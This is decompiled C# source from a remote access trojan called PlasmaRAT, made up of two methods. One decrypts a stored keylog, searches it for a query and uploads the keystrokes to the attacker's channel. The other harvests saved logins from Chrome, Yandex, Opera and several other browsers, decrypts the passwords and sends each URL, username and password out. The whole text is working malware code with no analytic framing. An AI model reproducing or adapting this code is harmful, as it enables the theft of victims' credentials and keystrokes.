// Token: 0x0600003E RID: 62 RVA: 0x0000448C File Offset: 0x0000268C public static void SearchLogs(string query) { try { string text = PlasmaRAT.AES_Decrypt(File.ReadAllText(Logger.KeyLogFile)); if (text.Contains(query)) { string setting = Interaction.GetSetting("Microsoft", "Sysinternals", "PROCID", ""); PlasmaRAT.Send(string.Concat(new string[] { "KEYLOGS*", Environment.UserName.ToString(), ".", setting, "*", text, "\r\n", Logger.KeyLogs })); PlasmaRAT.TalktoChannel("Found Query in Keylogs, Uploaded Successfully!", string.Empty); } } catch (Exception ex) { } }
// Token: 0x06000083 RID: 131 RVA: 0x0000868C File Offset: 0x0000688C public static void passwordsz() { try { string[] array = new string[] { Environment.GetEnvironmentVariable("LocalAppData") + "\\Google\\Chrome\\User Data\\Default\\Login Data", Environment.GetEnvironmentVariable("LocalAppData") + "\\Yandex\\YandexBrowser\\User Data\\Default\\Login Data", Environment.GetEnvironmentVariable("LocalAppData") + "\\Kometa\\User Data\\Default\\Login Data", Environment.GetEnvironmentVariable("LocalAppData") + "\\Amigo\\User\\User Data\\Default\\Login Data", Environment.GetEnvironmentVariable("LocalAppData") + "\\Torch\\User Data\\Default\\Login Data", Environment.GetEnvironmentVariable("LocalAppData") + "\\Orbitum\\User Data\\Default\\Login Data", Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\Opera Software\\Opera Stable\\Login Data" }; foreach (string text in array) { SQLiteHandler sqliteHandler = new SQLiteHandler(text); sqliteHandler.ReadTable("logins"); if (File.Exists(text)) { int num = 0; int num2 = sqliteHandler.GetRowCount() - 1; for (int j = num; j <= num2; j++) { string value = sqliteHandler.GetValue(j, "origin_url"); string value2 = sqliteHandler.GetValue(j, "username_value"); string text2 = Passwords.Decrypt(Encoding.Default.GetBytes(sqliteHandler.GetValue(j, "password_value"))); if (Operators.CompareString(value2, "", false) != 0 & Operators.CompareString(text2, "", false) != 0) { Thread.Sleep(2000); PlasmaRAT.Send(string.Concat(new string[] { "PASS*", value, "*", value2, "*", text2, "*" })); } } } } } catch (Exception ex) { } }